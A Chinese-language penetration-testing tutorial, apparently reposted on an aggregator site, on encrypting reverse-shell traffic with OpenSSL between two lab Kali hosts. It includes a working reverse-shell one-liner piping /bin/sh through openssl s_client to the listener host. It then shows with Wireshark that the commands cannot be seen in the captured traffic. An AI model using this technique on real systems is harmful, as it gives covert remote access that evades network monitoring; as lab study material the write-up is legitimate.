流量加密之OpenSSL反弹加密

这篇具有很好参考价值的文章主要介绍了流量加密之OpenSSL反弹加密。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

1、OpenSSL 简介

2、使用 OpenSSL 反弹加密 shell

3、使用wireshark抓包验证

4、搭建 HTTPS Server


1、OpenSSL 简介

OpenSSL 是一个强大的、商业级的、功能齐全的开源工具包,用于 TLS(以前称为 SSL)、DTLS 和 QUIC(目前仅限客户端)协议,协议实现基于全功能通用加密库,也可以单独使用,还包括一个加密模块经过验证,符合 FIPS 标准,是一个安全套接字层密码库,囊括主要的密码算法、常用密钥、证书封装管理功能,主要用于实现ssl协议。

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

2、使用 OpenSSL 反弹加密 shell

以 Linux 环境为例,测试主机为两台 kali

kali A 的IP为:192.168.249.128

kali B 的IP为:192.168.249.132

假设我们从 A 主机反弹 shell 到 B 主机

首先我们需要在B主机上使用 OpenSSL 生成自签名证书,证书有效期为一年

执行如下命令:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

这里我新建了一个目录 test 便于观察生成的文件 

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

生成过程中会询问我们一些信息,都可以不用填写直接回车

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

ls可以看到生成了两个文件:cert.pem 和 key.pem 

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

利用生成的自签名证书(cert.pem和key.pem )

在 B 主机上使用 OpenSSL 开启端口监听,这里使用 1337 端口启动一个 SSL/TLS server

执行如下命令:

openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

 此时在主机 A 执行如下命令,IP 为主机 B 的 IP:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.249.132:1337 > /tmp/s; rm /tmp/s

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

此时观察主机 B 

反弹shell成功

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

执行一些命令试试

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

3、使用wireshark抓包验证

进入eth0,开启抓包

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

在主机 B 执行一些命令(我这里执行的是ls、whoami、ifconfig)

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

观察wireshark抓包内容

无敏感信息泄露

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

追踪TCP流

看不出什么

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

追踪TLS流

看不到任何内容

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

主机 A 和主机 B 之间在使用 TLS1.2 协议进行加密通信,因此无法看到执行的命令和返回信息。

4、搭建 HTTPS Server

我们也可以使用生成的自签名证书(cert.pem和key.pem )搭建 HTTPS Server )

命令如下:

openssl s_server -key key.pem -cert cert.pem -accept 44444 -WWW

在 44444 端口启动一个 HTTPS 服务

(这里做了一个首页文件index.html)

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web

可以正常访问到,并且使用的是https

流量加密之OpenSSL反弹加密,内网渗透,web,https,web安全,ssl,linux,wireshark,web文章来源地址https://www.toymoban.com/news/detail-794057.html

到了这里,关于流量加密之OpenSSL反弹加密的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网渗透——macOS上搭建Web服务器

    # 公网访问macOS本地web服务器【内网穿透】 以macOS自带的Apache为例,在本地启用apache服务器,并通过cpolar内网穿透将其暴露至公网,实现在公网环境下访问本地web服务。 1. 启动Apache服务器 在macOS上打开终端,执行命令启动Apache服务器,提示 Passwod ,输入密码 浏览器访问localh

    2024年02月08日
    浏览(38)
  • Elasticsearch基本安全加上安全的 HTTPS 流量

    在生产环境中,除非您在 HTTP 层启用 TLS,否则某些 Elasticsearch 功能(例如令牌和 API 密钥)将被禁用。这个额外的安全层确保进出集群的所有通信都是安全的。 当您在模式下运行该elasticsearch-certutil工具时http,该工具会询问几个有关您希望如何生成证书的问题。虽然有许多选

    2024年02月05日
    浏览(39)
  • 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

    内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或

    2024年02月08日
    浏览(41)
  • 网络安全(黑客)内网渗透基础知识

    0x01 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。 内网是封闭型的,它可以由办公

    2024年02月13日
    浏览(59)
  • 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)

    Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS。拥有多种协议主机上线方式,集成了端口转发,服务扫描,自动化溢出,多模式端口监听,winexe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑;钓鱼攻击包括:站点克

    2024年02月11日
    浏览(48)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(56)
  • elasticsearch8.9.1部署及配置基本安全性以及安全的 HTTPS 流量

    1、官网下载elasticsearch8.9.1安装包,上传至服务器并解压 官网地址 解压 2、修改elasticsearch配置文件elasticsearch.yml(支持ipv4以及ipv6双栈),文件权限修改成非root的应用程序账号 1、进入elasticsearch根目录 注:1、输出文件名称(默认)2、CA密码设置(可留空直接回车,生产环境建议

    2024年02月03日
    浏览(38)
  • 网络安全内网渗透之信息收集--systeminfo查看电脑有无加域

    systeminfo输出的内容很多,包括主机名、OS名称、OS版本、域信息、打的补丁程序等。 其中,查看电脑有无加域可以快速搜索: 输出结果为WORKGROUP,可见该机器没有加域: systeminfo的所有信息如下: C:UsersAdministratorsysteminfo 主机名:           USER-20210123NC OS 名称:          M

    2024年02月07日
    浏览(60)
  • Nginx解决通过openssl自签名证书访问Https报不安全告警的问题

    nginx代理设置自签ssl证书并进行https方式访问,浏览器中会报不安全的告警,记录一下处理过程 本文内容摘自CSDN博主「Dylanu」的原创文章 解决https网站通过nginx+openssl自签名证书访问,在谷歌浏览器报不安全告警的问题 使用指定-subj “/C=CN/ST=MyProvince/L=MyCity/O=MyOrganization”,生成根

    2024年02月03日
    浏览(42)
  • 使用新版frp为多个内网web服务添加https支持

    二级域名一个(example.com) 云服务器一台(假如ip为:server-ip) 申请一个或多个三级域名的 SSL 证书,并下载为 crt/key 格式证书 domain1.example.com domain2.example.com domain3.example.com 将申请SSL证书的相关三级域名 A记录 DNS解析指向 server-ip 一个或多个本地内网web服务 前往 Frp Github Releases 页面

    2024年02月04日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包